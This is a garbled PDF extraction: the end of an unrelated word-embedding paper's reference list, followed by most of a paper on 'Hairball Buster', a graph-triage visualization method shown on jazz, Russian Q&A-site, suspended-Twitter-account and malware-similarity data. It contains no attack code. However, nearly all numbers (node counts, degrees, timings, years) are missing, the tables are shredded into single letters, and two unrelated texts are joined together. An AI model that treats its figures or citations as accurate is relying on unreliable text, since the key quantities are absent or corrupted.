in proceedings of emnlp- conll. jagadeesh jagarlamudi, raghavendra udupa, and hal daumé. . generalization of cca via spectral embedding. in proceedings of the snowbird learning workshop of aistats. yehuda koren and liran carmel. . visualization of labeled data using linear transformations. in proceed- ings of ieee conference on information visualization. thomas k. landauer, peter w. foltz, and darrell la- ham. . an introduction to latent semantic analy- sis. discourse processes, : – . angeliki lazaridou, eva maria vecchi, and marco ba- roni. . fish transporters and miracle homes: how compositional distributional semantics can help np parsing. in proceedings of emnlp. tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word represen- tations in vector space. in proceedings of iclr work- shop. tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. b. distributed representa- tions of words and phrases and their compositionality. in proceedings of nips. tomas mikolov, wen tau yih, and geoffrey zweig. c. linguistic regularities in continuous space word representations. in proceedings of naacl-hlt. george a. miller and walter g. charles. . contex- tual correlates of semantic similarity. language and cognitive processes, ( ): – . george a miller. . wordnet: a lexical database for english. communications of the acm, ( ): – . andriy mnih and geoffrey hinton. . three new graphical models for statistical language modelling. in proceedings of icml. shashi narayan and shay b. cohen. . optimizing spectral learning for parsing. in proceedings of acl. ankur p. parikh, shay b. cohen, and eric xing. . spectral unsupervised parsing with additive tree met- rics. in proceedings of acl. jeffrey pennington, richard socher, and christopher manning. . glove: global vectors for word rep- resentation. in proceedings of emnlp. kira radinsky, eugene agichtein, evgeniy gabrilovich, and shaul markovitch. . a word at a time: com- puting word relatedness using temporal semantic anal- ysis. in proceedings of acm www. sascha rothe and hinrich schütze. . autoex- tend: extending word embeddings to embeddings for synsets and lexemes. in proceedings of acl-ijcnlp. herbert rubenstein and john b. goodenough. . contextual correlates of synonymy. communications of the acm, ( ): – . carina silberer, vittorio ferrari, and mirella lapata. . models of semantic representation with visual attributes. in proceedings of acl. richard socher, john bauer, christopher d. manning, and andrew y. ng. . parsing with compositional vector grammars. in proceedings of acl. karl stratos, michael collins, and daniel hsu. . model-based word embeddings from decompositions of count matrices. in proceedings of acl. karl stratos, michael collins, and daniel hsu. . unsupervised part-of-speech tagging with anchor hid- den markov models. transactions of the association for computational linguistics, : – . peter d. turney and michael l. littman. . corpus- based learning of analogies and semantic relations. machine learning, ( - ): – . peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, ( ): – . peter d. turney. . similarity of semantic relations. computational linguistics, ( ): – . zhen wang, jianwen zhang, jianlin feng, and zheng chen. . knowledge graph and text jointly em- bedding. in proceedings of emnlp. tong wang, abdelrahman mohamed, and graeme hirst. . learning lexical embeddings with syntactic and lexicographic knowledge. in proceedings of acl- ijcnlp. chang xu, yalong bai, jiang bian, bin gao, gang wang, xiaoguang liu, and tie-yan liu. . rc-net: a general framework for incorporating knowledge into word representations. in proceedings of the acm cikm. dongqiang yang and david mw powers. . mea- suring semantic similarity in the taxonomy of word- net. in proceedings of the australasian conference on computer science. david yarowsky. . unsupervised word sense dis- ambiguation rivaling supervised methods. in proceed- ings of acl. wen-tau yih, geoffrey zweig, and john platt. . po- larity inducing latent semantic analysis. in proceed- ings of emnlp-conll. mo yu and mark dredze. . improving lexical em- beddings with semantic knowledge. in proceedings of acl. connections issue | vol. article | doi: . /connections- - hairball buster: a graph triage method for viewing and comparing graphs patrick allen,* mark matties and elisha peterson johns hopkins university applied physics laboratory, laurel, md. *e-mail: patrick.allen@jhuapl.edu abstract hairball buster (hb) (also called node-neighbor centrality or nnc) is an approach to graph analytic triage that uses simple calculations and visualization to quickly understand and compare graphs. rather than displaying highly interconnected graphs as ‘hairballs’ that are difficult to understand, hb provides a simple standard visual representation of a graph and its metrics, combining a monotonically decreasing curve of node metrics with indicators of each node’s neighbors’ metrics. the hb visual is canonical, in the sense that it provides a standard output for each node-link graph. it helps analysts quickly identify areas for further investigation, and also allows for easy comparison between graphs of different data sets. the calculations required for creating an hb display is order m plus n log n, where n is the number of nodes and m is the number of edges. this paper includes examples of the hb approach applied to four real-world data sets. it also compares hb to similar visual approaches such as degree histograms, adjacency matrices, blockmodeling, and force-based layout techniques. hb presents greater information density than other algorithms at lower or equal calculation cost, efficiently presenting information in a single display that is not available in any other single display. keywords graph analytic triage, node-neighbor centrality, standard canonical form for graphs, comparing graphs. purpose and overview the purpose of this paper is to describe a new method for analyzing relationships among nodes in a graph using a canonical representation that also enables comparison between different graphs. the approach is called ‘node-neighbor centrality’ (nnc), or more colloquially, ‘hairball buster’ (hb). hb computes a centrality measure (such as node degree) for a node and its neighbors, and presents this computation in an efficient, standardized visual form that scales to very large graphs. using the visual depiction of the measure, an analyst can quickly answer questions such as whether the graph is (generally) from a social network or a random graph. additionally, the depiction retains information about relationships, so an analyst can also quickly determine whether high-degree nodes are connected to each other directly or through a mutually adjacent node, such as in a bipartite graph. this paper presents examples of the hb approach addressing five types of analytic questions using four real-world data sets. hb is a canonical approach using node degrees that allows for comparison of different graphs, while extensions of hb include the display of selected graph attributes such as link weights. the use of alternative measures of centrality is also presented. the approach is compared and contrasted with other common graph algorithms. the paper concludes with the limitations of the hb approach and future planned features and applications. the hb python code is available at https://github. com/patallen /hairball-buster. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). hairball buster: a graph triage method for viewing and comparing graphs the need the most commonly used graph visualization techniques include node-link visualizations that embed a graph’s nodes and links in two-dimensional space, and adjacency matrix visualizations that show the entire space of possible connections in a large matrix. each of these techniques has a number of advantages and disadvantages (ghoniem et al., ). a particularly challenging case is graphs that have so many elements and interconnected features that it becomes difficult to determine which nodes and links are most ‘important.’ when using standard graph visualization algorithms such as force-directed (kamada and kawai, ; fruchterman and reingold, ) or dimensional reduction, the usual starting point is a depiction of all nodes and links. for many kinds of graphs, especially those with high connectivity, this results in a ‘hairball’ as shown in figure , which shows a link between every pair of jazz musicians that have performed together (gleiser and danon, ). the purpose of graph visualization is to help an analyst understand features of the graph or a particular node, using visual queries (freeman, ; peterson, ; ware, ). however, in this typical ‘hairball,’ it is difficult to determine at a glance the nodes with the highest degree, the distribution of nodes by degree, and whether the highest degree nodes are directly connected to each other. an analyst needs to apply a range of other algorithms to further dissect the graph, sometimes requiring multiple iterations, to determine how the various nodes relate to each other. in addition, there are a number of additional challenges that arise when visualizing graphs that change over time (bender-demoll and mcfarland, ; peterson, ). there is a tendency in force-directed visualization for nodes and links to reposition themselves, every time new nodes or links are added or removed. this makes it difficult not only to identify key nodes, but to track them over time. a number of approaches have been suggested, but they do not fully address the issue and are computationally expensive (bender-demoll and mcfarland, ; brandes and corman, ; moody et al., ; peterson, ; zweig, ). an alternative approach is the backbone layout, which attempts to directly resolve difficulties in visualizing particularly dense portions of a force- directed layout (lehmann and kottler, , nocaj et al., , ). figure shows the same data set using visone’s quadrilateral simmelian backbone layout. while the big hairball of figure has been broken up into four clusters, one large hairball has turned into several smaller hairballs. one still cannot answer many questions of interest to a data analyst, e.g. which nodes have the highest degree or how nodes of high degree are connected to each other. there is also an inherent performance cost when generating force-directed graph displays, most of which are at a minimum order n , where n is the number of nodes (fruchterman and reingold, ). because of the challenges in visualizing node- link diagrams in these cases, alternatives, such as an adjacency matrix visualization, are often proposed (sheny and maz, ). adjacency matrices also can be a very effective way to visualize clusters, so they are often used when studying communities, sometimes referred to as clustering or blockmodeling (wasserman and faust, ; white et al., ). in one study, the authors found that the adjacency matrix is almost always superior for a certain set of tasks to the node- link diagram (ghoniem et al., ). however, the authors did not include any graphs with more than nodes in their study, and this is the principle drawback of adjacency matrix visualizations: they do not scale well to graphs with thousands or millions of nodes. hb approach hb is a new way of looking at graph data that scales effectively to large, dense graphs. the approach is simple to calculate and plot, and provides an easy way to identify by inspection the most connected nodes and most important links in the graph. assume there is a graph with n nodes and m links. the degree of each node is the number of links connected to that node. (throughout this paper, we will use degree as our primary measure of centrality, figure : sample ‘hairball’ showing jazz players that performed with each other. connections although hb representations of other centrality measures are presented later.) there are six steps to creating the hb plot as follows: . calculate the centrality (degree) of each node (which requires m calculations). . sort the nodes by degree, assigning ranks from (the highest degree node) to n (which requires n log n calculations). . plot (in one color) the monotonically decreas- ing curve of degree (vertical axis) vs. node rank (horizontal axis). (there will be n points on this curve, one for each node.) call this ‘the curve’ and the nodes on it ‘curve nodes.’ . calculate the neighbors of each node and place each neighbor on a list associated with each ranked node. (the placement of the neighbor on the list of neighbors for each node is accomplished during the initial m calcula- tions in step .) . store the degree of the neighbor with the neighbor node. (this step uses an index for each node so that the degree of the neighbor is an indexed look-up.) . for each node, plot (in another color) the value of each of its neighbor’s degrees on the verti- cal line at the same horizontal position as that node, so that each of its neighbors will be rep- resented above or below that node’s position on the curve. call these the ‘neighbor nodes.’ optional calculations, such as ensuring canonicalization and parallelization, and display options for log–log, semi–log, inverse, and same degree offsets, are pre- sented in section ‘optional steps of the hb algorithm.’ the computational efficiency of hb is on the order of m + n log n. in contrast, traditional graph displays that look like the hairball shown in figure require order n (fruchterman and reingold, ). in addition, some algorithms only sample the graph data set, while the hb approach deals with the whole data set in one pass (squartini et al., ). see section ‘hb measures of performance’ for further details. in addition to computational efficiency, hb uses visual space more efficiently than an adjacency matrix, making it suitable for graphs of any size. it supports many of the same visual queries as an adjacency matrix, with the additional advantage that it can highlight not just a node’s neighbors or clusters, but also how a node’s centrality measure relates to those of its neighbors. in the remainder of this paper, these advantages are described in more detail by analyzing several real-world sample graphs. first application: quickly identifying key nodes and relationships in a graph this section uses the jazz data set to illustrate how hb can answer common analytic questions about figure : visone backbone layout of jazz player data set. hairball buster: a graph triage method for viewing and comparing graphs which nodes have the highest degree and how these are connected to other types of nodes. figure depicts the degree curve (step , above). note that there are four very high-degree nodes in the upper-left-hand corner. the rest of the nodes follow a fairly linear path from upper left to lower right. (this pattern is typical for social networks.) figure displays the neighbors of the curve nodes (steps , , and above). each red dot represents one or more links on a traditional graph display. the dot’s vertical position indicates the node at one end of the link and its horizontal position indicates the node at the other end. for example, the red dot at coordinate ( , ) is the link between figure : sample hb curve for jazz players that performed with each other. figure : neighbors plot for jazz players that performed with each other. connections the first and second nodes on the curve (first two blue dots). this curve is not quite the same as a histogram or node-degree distribution, where one dot represents many nodes of the same degree. as with node- degree curves, the shape can be useful for comparing different graphs. however, hb displays one dot for each node, since the horizontal axis is the degree rank of the node. this is an important distinction, because hb retains connectivity information about individual nodes that other techniques do not and can therefore answer a much broader class of questions. it can also address additional questions that an adjacency matrix cannot, as will be summarized later. unlike the backbone layout display, the hb chart clearly shows which nodes have highest degree, how much higher their degree is than other nodes, whether the highest degree nodes are directly or indirectly connected to other high-degree nodes, and how high- degree nodes tend to connect to low-degree nodes. this is summarized in figure . for instance, using the hb visual for jazz players in figure , the top nodes are all clearly connected to each other (forming a fully connected subgraph), since there is a red dot on the same row and column as the three blue dots representing the eight highest degree nodes on the curve. for example, the highest degree node (rank , degree ) is connected to the second highest ranked node (rank , degree ), indicated by the red dots plotted at rank /degree and rank /degree . this pattern continues with the remainder of the top nodes. this specific kind of connectivity information cannot be determined from a backbone or a histogram display. second, the highest degree jazz players rarely performed with the lowest-degree jazz players, as shown by the gaps in the far side of the upper right quadrant, which increase in frequency and length as the rank increases to the right. this means that the number of lower-ranked musicians with whom the most connected musician performed is small. third, there are few dots near the bottom of the chart. this shows that jazz players who have performed with many others have tended to perform with other jazz players who have also performed with many others, and not with those who have performed with few. in general, the upper-left ‘quadrant’ or section of figure shows which high-degree nodes are mutually connected to other high-degree nodes. if some of the highest degree nodes are not connected with each other, this can indicate that there are different clusters of nodes around some of the high- degree nodes (an observation that can be made without running a clustering algorithm). conversely, if the highest degree nodes are mostly directly connected to each other, this provides a different pattern around a core group to analyze further. in the upper right and lower left quadrants, it is easy to see which high-degree nodes connect with lower-degree nodes and which do not. a high-degree node with many connections to one-degree nodes indicates a common star pattern on traditional graph displays. however, if one finds the highest degree nodes are connected to low-degree nodes rather than each other, then one may have a bipartite graph or other distinguishing feature. the lower right quadrant shows which lower- degree nodes connect with each other. if this area is sparse or empty, then the lower-degree nodes are only connecting with the higher-degree nodes. this is indicative of a star-like shape for some of the high- degree nodes. the visual can also be used to find nodes that are indirectly connected via an intermediate node. if two nodes a and b have a common neighbor c, then c will be depicted as a neighbor node on the same horizontal line above or below each of a and b. figure shows how the hb chart can appear for a directed graph. in this example, we randomly assigned a direction to the jazz player data set, where green indicates an ‘in’ link to the node in that row, while red indicates an ‘out’ link. the jazz player data set consisted of undirected links, and this figure just shows how directed graphs would appear if the links were directed. second application: quickly identifying core groups or multiple groups this section shows how hb can quickly determine whether there is a single core group or multiple core groups in a data set. this example uses toaster figure : questions addressed by location of neighbor nodes. hairball buster: a graph triage method for viewing and comparing graphs figure : sample directed neighbors plot for jazz player data set (green = in, red = out). (toster dot ru), which is a russian social media site for software support and help from a community of subject matter experts (smes). it is similar to the popular stackoverflow site, but the toaster data set is smaller and provides a form of ground truth in terms of user-provided tags for purposes of comparison. the toaster data have a set of threaded discussions where a person posts a question, someone else posts an answer (usually an sme), and then others can comment on both the question and the answer. the data set at the time of download had over , nodes, , , edges, and over , discussions. initial work by others at apl examined how to find figure : force-directed representation of the toaster data set. sub-communities within the larger community represented by the toaster data set. see figure for a traditional force-directed visualization of the toaster data set. this image definitely qualifies as a hairball! as shown in figure , the backbone layout did not produce more informative results. to apply the hb approach to this data set, we first removed duplications and focused entirely on whether any username in the data set communicated with any other username in the data set. the analytic question we are asking is ‘who are the core members, and are there any large communities with unique core members?’ while the original data set had , nodes and almost million edges, the de-duped data set had , nodes and , edges. figure shows the hb representation of the nearly , nodes. focusing on the highest-ranked nodes, the top can be readily identified, while the remaining are difficult to visually distinguish. each of the top-ranked nodes appears to connect to all the other high-ranked nodes, and the first obvious visual gaps occur at around , nodes. this indicates that the top-ranked nodes are either fully connected or very nearly fully connected. while displaying the full data set provides the information described above for the first nodes, it does not definitively indicate whether the highest degree nodes are fully connected, or whether they belong to separate clusters due to visual occlusion. to address this limitation, it helps to view the ‘inverse’ of the neighbors – that is, to display the connections figure : backbone layout representation of the toaster data set. figure : hb representation of the toaster data set (directionality ignored). missing links (the gaps), and to zoom in on the top nodes. (zooming in on the display adds no additional computational penalty beyond rendering.) when there are no dots in the inverse, the graph is fully connected. figure shows this inverse display zoomed in on the first nodes. it appears that the top nodes are almost, but not quite, fully connected. figure zooms in further on just the top nodes, again showing the ‘inverse’ neighbors. it is clear that nodes through are fully connected and that nodes through are almost fully connected. hairball buster: a graph triage method for viewing and comparing graphs figure : hb representation of the inverse of neighbor nodes (e.g. gaps). figure : hb inverse representation of just the top ranked nodes with each other in toaster data set. note that zooming in on the inverse neighbors was a simple way to gain a more definitive understanding of the graph while incurring virtually no additional computational cost. in summary, using our triage approach based on hb, we can quickly see that the top-ranked smes in the toaster data set have all commented on, or been commented on, by each other, and the top nearly so. this means that there is likely to be just one core group in the toaster community all connected with each other. in contrast, it takes more than one algorithm and manual steps to provide similar data. for example, we ran a histogram on the toaster data set, which connections while k-truss is not available in gephi, it is useful in identifying clusters in data sets. however, when the top nodes are fully or nearly fully connected, the k-truss algorithm will not provide additional useful information about these nodes. third application: hb and temporal graphs a significant benefit of the hb chart approach is that the canonical format allows multiple curves/ graphs to be compared at once. as an example, we divided the toaster data set into blocks of , connections representing approximate slices of the data set over time (since the initial data set was in roughly chronological order). we then compared the hb depictions of the first , node connections with the second and third blocks. figures to show these three batches of nodes and links plotted with the same axis scales for ease of comparison. in figure , there is one node above degree , which is a much higher degree than any of the other nodes. the next highest node is around , followed by a couple at and then a fairly smooth curve toward the lowest degrees. figure shows that in this next time period, the -degree node is the highest-ranked node and the -degree nodes are still present, but there is also an interesting bump in the curve around degree . figure also has a figure : force atlas on top nodes in toaster data set. identified the top to nodes as having the highest degree. we then ran gephi, ranking the nodes by degree and manually copied the top nodes to visualize using force atlas . figure shows the results using degree as the node label. while the process took roughly min, hb provided the results in sec for the initial display and then for the inverse display. the gephi example does show highly connected nodes, but does not conclusively show which are fully connected, and required greater time and calculation cost than hb. figure : hb chart of first , connections in toaster data set. hairball buster: a graph triage method for viewing and comparing graphs figure : hb chart of third , connections in toaster data set. figure : hb chart of second , connections in toaster data set. maximum degree node at , but also one at , , and . this third set of , connections also has a ‘bump’ in the curve around degree that is similar to the bump in figure . in typical node-link visualizations, visualizing changing graphs compounds many of the issues associated with visualizing static graphs. in addition, there are new forms of ‘visual noise’: nodes/edges that are displayed or removed without warning, and nodes/edges that move rapidly from one time period to the next without warning (peterson, ). many approaches have been suggested to address these connections issues, but they are computationally expensive and only work well in limited cases (bender-demoll and mcfarland, ; brandes and corman, ; moody et al., ; peterson, ; zweig, ). in contrast, the hb approach is computationally inexpensive and high in information content. hb does not address all of these issues, but allows the analyst to focus on how the centrality of a specific node changes over time, or how the distribution of centrality changes over time. for example, does the shape of the curve change over time? this is shown in figures to for the toaster data set. does the rank of each node change over time? this can be added in a later version of the hb code. see section ‘future features and applications of hb’ for such an approach. fourth application: identifying anomalous features this section describes how hb can be used to quickly identify selected anomalous features in a data set associated with the highest degree nodes, using suspended iranian twitter™ accounts obtained from https://about.twitter.com/en_us/values/elections- integrity.html#data (twitter™, ). this data set for user-id replies with no retweets between nodes included , nodes and , edges. figure was calculated in about sec on a single- threaded laptop, and shows that one node dominated with over , replies. the next two highest nodes had around , replies and just under , replies, respectively. (displaying over , nodes and , links would not be feasible in an adjacency matrix. see section ‘comparing hb to other algorithms’ for comparisons to both the adjacency matrix and blockmodeling.) figure shows how much larger the degree of highest node is compared to all other nodes, as well as for the second and third degree nodes. more importantly, this figure shows an interesting pattern in gaps in the reply pattern of these top nodes, as well as the highest of the next lower- degree-ranked nodes. for example, the highest degree mode appears to connect with most of the rest of the nodes except around nodes ranked at k, while the second highest degree node has multiple gaps and the third highest degree node does not appear to connect with about half the nodes. zooming in on the left-hand side, figure shows the same data limited to the first nodes. note that the three top-ranked nodes connected with each other and many other nodes, but did not connect with the next highest-ranked nodes except in one case. what is the reason for such an unusual pattern? the authors do not know for sure, but it may be that nodes through are bots run by a different team than those running the first three nodes. (of the th through th nodes, the th node communicated with most of the other nodes, but most of the rest of the nodes did not communicate with each figure : hb chart of suspended iranian twitter™ accounts, user-id replies, and no retweets. hairball buster: a graph triage method for viewing and comparing graphs other.) in any case, hb is an efficient way to quickly identify areas of interest and further investigation into anomalous data without having to slowly whittle down a huge hairball display. this approach might also be useful in helping identify other twitter™ bots in the future based on similar patterns. fifth application: quickly identify nodes connected by highest-value link weights this section shows how hb can be used to identify key relationships in graphs with link weights. this example uses output data from a tool called codedna™, a patented malware analysis tool developed at jhu/apl that provides a fast, reliable, automated means for recognizing related malware binaries and linking variants. it ‘supports crowd- sourcing of information by providing a robust malware identifier (fingerprint) that is deterministic and repeatable for correlating reports, analyses, and other information about attackers, yet cannot be used to re-create the original malware’ (maughan and carlsten, ). by generating dna-like fingerprints from input files, and computing similarity between these fingerprints, codedna™ can effectively identify clusters of related malware in very large data sets. figure shows some samples of clusters of malware previously produced by codedna™. for purposes of this paper, we obtained a data set based on linux coreutils rather than real malware, and figure : hb chart of suspended iranian twitter™ accounts, user-id replies, no retweets, first nodes showing gaps among the top and the next nodes. processed the data through codedna™ software. figure shows the seven clusters produced by codedna™, where each cluster represents elements of the code that have ‘similarity scores’ between . and . . a similarity score is an output of codedna™ that determines how similar one code binary is to another code binary. in figure , the red lines represent a similarity score of . , meaning the code samples are nearly identical. the blue lines represent the score of . , meaning that roughly % of the code is similar according to codedna’s algorithms. the remaining links between the nodes are shaded between blue and red as the similarity score increases. using . as the lowest similarity score that defines a related cluster, figure shows that the outputs divide into seven clusters. to challenge the hb approach, we selected the cluster that had the most nodes ( ) and the most links ( ). this is almost a fully connected graph, which would have links. figure shows the first attempt at displaying this cluster’s data in hb. the problem is that many of the nodes have exactly the same rank, which makes it difficult to discern how the nodes relate to each other. it would also be useful to color code the similarity scores of each edge to provide further detail about how these nodes relate to each other. the solution is to offset the nodes slightly on the vertical in order to allow for each unique link between nodes to be displayed. in figure , nodes with the same degree are increased or decreased by . so that the monotonically decreasing curve is maintained, connections figure : sample chart of codedna™ cluster outputs of malware binaries. and is centered on the original degree value. (if there are more than nine nodes with the same degree, use a smaller offset to fit them in between the next whole number degree rows.) we added a line to connect the nodes to make it easier to see the curve. in addition to the vertical offset, we further color- coded the similarity values of each link or edge. the following colors represent the different ranges of similarity scores: orange = . to , red = . to . , green = . to . , and purple = . to . . note that nodes through have high similarity scores, and a bit less similarity with nodes , , and , even though they share the same degree. nodes through are figure : sample codedna™ cluster outputs of linux coreutils binaries. also similar to the nodes with degree . likewise, nodes through are similar to each other and to the nodes with degree . figure highlights these areas of high similarity by placing purple boxes around them. hb algorithm is canonical the applications above have illustrated how hairball buster can be used to answer key analytic questions. we now move on to a general discussion of the benefits of the approach and how it compares to similar existing techniques. hairball buster: a graph triage method for viewing and comparing graphs figure : sample codedna™ cluster output in standard hairball buster (blue = nodes, gray dots = links). figure : sample codedna™ cluster output in hb with vertical offset. hb is canonical in the sense that each graph has a unique visual representation. this consistency is a significant benefit, allowing different data sets, or different time slices of the same data set as in section ‘third application: hb and temporal graphs,’ to be compared, regardless of size. to ensure uniqueness, the ranking of nodes by degree must be consistent, and this ordering must be chosen at the outset. the simplest way to do this is to assign a unique label to each node and sort them alphanumerically, thus ensuring a canonical display. this was done ‘behind the scenes’ in the above applications. connections another approach is to rank nodes that are tied by having the same degree by their connections to neighbors with the highest rank. for example, all of the one-degree nodes will be ‘tied’ with each other, but a tie-breaker is the degree of the node to which it is connected. if ties still exist after a first pass, then nodes can be ranked by the neighbor’s neighbors. repeat as necessary. if there is still ambiguity between any nodes, simply assign a label to the node and republish the data set so all parties interested in that data set may use the same labels. hb measures of performance many traditional graph layout approaches are computationally intensive because they position each node based on distance relative to every other node and on which nodes share (or are otherwise affected by) links. this n computation means that significant time is required to render a single ‘hairball’ graph with several thousand nodes, and many additional computationally intensive steps may be required to break the hairball into something more readily understandable. in contrast, the hb algorithm has order n log n. for small data sets such as the jazz data set, on a single-threaded laptop there is no noticeable difference in the performance between the two. for large data sets such as the twitter™ data set with over , nodes, however, the difference between n and n log n becomes very significant. table shows experimental results. while the run time is similar for hb and backbone for small data sets, the larger the data set, the better hb performs compared to backbone layout. for k nodes, backbone could not complete in min, whereas hb completed in less than sec. moreover, hb consistently completed for graphs of million nodes in around sec, whereas the backbone algorithm could not be tested because visone could not load this volume of data. the hb approach uses python code to calculate the curves and neighbors from networks defined in standard graphml or csv form. it then creates cartesian plots for the actual visualization. the approach could be probably executed much faster if optimized and parallelized. in hb, every node and neighbor’s location is well defined, easily calculated, and does not change significantly when a new set of nodes or links are added. it does not answer every question, but can identify features that help effectively target what subsets of nodes to use as inputs to more computationally intensive algorithms that do answer deeper questions. hb using other measures of centrality in addition to degree, hb can also display the rank of the nodes by other centrality measures. these expand the type of questions that can be answered by analysts using hb. figure : sample codedna™ cluster output in hb with vertical offset and highlighting nodes with highest similarity scores. hairball buster: a graph triage method for viewing and comparing graphs t a b le . p e rf o rm a n c e c a lc u la ti o n s c o m p a ri so n s fo r h b v s b a c k b o n e la yo u t. d a ta s e ts h b r u n t im e ( s) vi so n e r u n t im e – q u a d s im ( s) vi so n e r u n t im e – t ri s im ( s) f ile n a m e f ile s iz e (b ) n o . o f n o d e s n o . o f e d g e s a vg a vg a vg ra n d o m - - n o d es .g ra p h m l , , , . . . . . . . . . . . . ra n d o m - - n o d es .g ra p h m l , , , , . . . . . . . . . . . . ra n d o m - -n o d es . g ra p h m l , , , , . . . . . . . . . . . . ra n d o m - -n o d es . g ra p h m l , , , , , . . . . . . . . . . . . ra n d o m - -n o d es . g ra p h m l , , , , , . . . . > , ra n d o m - -n o d es . g ra p h m l , , , , , , . . . . v is o n e co u ld n o t lo ad g ra p h m l f ile . in su ffi ci en t m em o ry co d e- d n a. g ra p h m l , < s ec < s ec < s ec < s ec < s ec < s ec < s ec < s ec < s ec ja zz -d ire ct ed . g ra p h m l , , < s ec < s ec < s ec < s ec < s ec < s ec < s ec < s ec < s ec to st er _c a _ e d g e. g ra p h m l , , , , . . . . . . . . . . . . ira n -t w ee t- re p lie s. n o -r et w ee t. b y- u se rid . g ra p h m l , , , , . . . . > , connections node relationships and graph characteristics, (ii) representing large or directed networks or graphs with weighted links, and (iii) the ability to represent other centrality measures and representing graphs in a standard format at low calculation cost. these are used to compare hb with several other techniques: a histogram of node centralities, a standard force- directed layout, a backbone layout, a standard adjacency matrix with nodes sorted by degree, and an adjacency matrix where nodes have been ordered based on clusters (i.e. blockmodeling). the histogram does not provide information about neighbors, connectivity, number of clusters, weighted links, or directedness. similarly, the adjacency matrix cannot represent centrality measures other than degree, has no visual cues for comparing one node’s degree to its neighbors or finding clusters, is not usable for very large data sets, and has no log–log or semi–log representation. (this paper assumes that the adjacency matrix has already been sorted by degree in terms of both rows and columns in order to compare well against hb.) while blockmodeling can depict the number of clusters in a graph, it cannot represent other centrality measures, log–log or semi–log representation, is not canonical, and requires a large number of calculations. moreover, even when successfully representing clusters, blockmodeling works well only when there are several communities highly connected within blocks and having only sparse connections between blocks. blockmodeling requires at least n calculations, and most references cite n calculations being required (white et al., ; wasserman and faust, ; girvan and newman, ; jackson, ; gopalan et al., ). while force-directed and backbone layout visualizations can show some clustering, they cannot provide the distribution of nodes by degree and the we focused on the following measures. the clique count of a node with n neighbors as the count of the n     neighbor pairs that are connected. the clique count (order ) is the number of node pairs within distance of the node that are connected. the decay centrality of a node i is the weighted sum decay (i) = ∑ j≠i δl(i,j), where δ is a decay parameter and l(i,j) is the minimum distance from i to j (or infinite if the nodes are in different components). the betweenness centrality of a node measures how likely the node is to lie along the shortest paths between other nodes in the graph. more details on these centrality measures are available in the studies of wasserman and faust ( ) and jackson ( ). figure shows the hb visual for each of these measures for both the jazz data set and a randomly generated graph. the resulting figures emphasize how a node’s centrality measure is related to those of its neighbors. each chart illustrates major structural differences between the jazz graph and a random graph. for example, in the decay centrality figures, the centrality of neighbors in the jazz data sets differs significantly, whereas in the random graph case the decay centrality of neighbors is very similar (note the vertical axis shows values between and only). these examples also show how hb can be applied to floating point as well as integer-valued metrics. (note that some metric calculations, betweenness centrality in particular, are computationally expensive and may negate some of the performance advantages of the hb approach.) comparing hb to other algorithms this section describes how hb differs from other commonly used graph analytic and visualization algorithms. table lists analytic questions and features grouped into three sections: (i) understanding figure : displaying different measures of centrality in hb. graph degree distribution degree centrality clique count clique count (order ) decay centrality (decay parameter . ) betweenness centrality jazz n = , e = random edges n = , e = . order means displaying the number of triangles in the subgraph formed from all nodes within two hops of the chosen node . betweenness centrality is expensive to compute, so this version of the plot lacks the benefit of fast computation hairball buster: a graph triage method for viewing and comparing graphs t a b le . c o m p a ri n g h b f e a tu re s to o th e r g ra p h a n a ly ti c a n d v is u a liz a ti o n a lg o ri th m s. f e a tu re h a ir b a ll b u st e r h is to g ra m / n o d e -d e g re e d is p la y f o rc e - d ir e c te d v is o n e b a c k b o n e a d ja c e n c y m a tr ix b lo c k m o d e lin g u n d er st an d in g n o d e re la tio n sh ip s an d g ra p h c h ar ac te ris tic s . d is tr ib u tio n o f n o d es b y d eg re e y es y es n o n o n o f n o f . q u ic kl y d et er m in e th e n u m b er o f h ig h -d eg re e n o d es y es y es n o n o y es n o f . q u ic kl y id en tif y w h ic h a re t h e h ig h es t d eg re e n o d es y es y es a n o b n o y es y es . d et er m in e if th e h ig h es t d eg re e n o d es a re d ire ct ly c o n n ec te d t o o th er h ig h -d eg re e n o d es y es n o y es c n o b y es y es . d et er m in e w h et h er t h e h ig h es t d eg re e n o d es a re c o n n ec te d t o ea ch o th er in d ire ct ly v ia t w o h o p s y es n o y es y es c y es y es . d et er m in e w h ic h lo w er -d eg re e n o d es a re d ire ct ly c o n n ec te d t o th e h ig h -d eg re e n o d es y es n o y es y es y es y es . p ro vi d e vi su al c u e o f h o w m u ch d iff er en ce e xi st s b et w ee n t h e d eg re e o f th e n o d es , es p ec ia lly h ig h -d eg re e n o d es y es y es n o n o n o y es . d et er m in e if th er e is o n e ce n tr al c lu st er o r m an y cl u st er s th at co n ta in t h e h ig h es t d eg re e n o d es y es n o y es y es n o y es r ep re se n tin g la rg e o r d ire ct ed n et w o rk s, o r w ith w ei g h te d li n ks . p ro vi d e lo g –l o g o r se m i– lo g r ep re se n ta tio n fo r ve ry la rg e d at a se ts y es y es n o n o n o n o . c an v is u al iz e b o th d ire ct ed a n d u n d ire ct ed g ra p h s y es n o y es e y es e y es y es . d et er m in e w h ic h n o d es c o n n ec t to t h e h ig h es t w ei g h te d li n ks y es n o y es d y es y es g y es g o th er c en tr al ity m ea su re s, s ta n d ar d f o rm at , lo w c al cu la tio n c o st . d is tr ib u tio n o f n o d es b y o th er c en tr al ity m ea su re s y es y es n o n o n o n o . p ro vi d e a ca n o n ic al r ep re se n ta tio n o f th e g ra p h y es y es n o n o y es n o . l o w c al cu la tio n c o st y es y es n o n o y es n o h n o te s: a if d is p la ye d o r av ai la b le v ia t o o lti p d is p la y; b ex ce p t fo r ve ry s m al l d at a se ts ; c fo r sm al l g ra p h s o r w h en e d g e s ar e n o t o cc lu d ed ; d in s o m e ca se s; e if lin k w ei g h ts d is p la ye d , e. g ., b y co lo r o r w id th ; f u n le ss o n e ca n c o u n t n u m b er o f n o d e o r lin ks v er y ca re fu lly ; g if lin k w ei g h ts d is p la ye d a s at tr ib u te s o f d o ts in t h e m at rix ; h o rd er a t le as t n a n d m o st r ef er en ce s st at e n . connections number and identity of highest degree nodes or their direct connectivity to other high-degree nodes except in very small data sets. there are also no visual cues as to how much larger one node’s degree is compared to another high-degree node. moreover, they do not represent other measures of centrality, are not canonical, and require at least n calculation cost. as shown in table , the only algorithms that can come close to the hb analytic triage approach in terms of computation time is the adjacency matrix and the node-degree distribution or histogram display. even 